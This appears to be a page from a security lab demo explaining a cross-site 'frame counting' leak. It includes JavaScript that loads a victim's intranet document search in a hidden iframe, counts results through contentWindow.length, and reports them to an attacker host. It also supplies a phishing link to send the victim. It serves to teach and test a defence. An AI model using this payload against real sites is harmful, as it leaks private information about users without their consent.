Attack 2 β Frame Counting
The payload loads the victim's document search in an invisible iframe and reads
iframe.contentWindow.length, which is
cross-origin accessible by the HTML spec, to count matching documents.
How it works
Payload running in Alice's browser at https://attacker.ssc-primesec.de:
const f = document.createElement('iframe')
f.src = 'https://intravault.ssc-primesec.de/documents/search?q=salary'
f.onload = () => {
const count = f.contentWindow.length β window.length is cross-origin accessible!
report({ query: 'salary', count }) β sent back here via SSE
}
Victim renders N hidden <iframes> (one per result) β count = N documents
π Phishing link β send this to Alice
https://attacker.ssc-primesec.de/payload/2
β Open as Alice
Alice must be logged in at intravault.test:3000.
Protected β all counts = 0 (login page has no iframes). Vulnerable β real counts leaked.
π‘ Live results β document frame counts
Waiting for payload to executeβ¦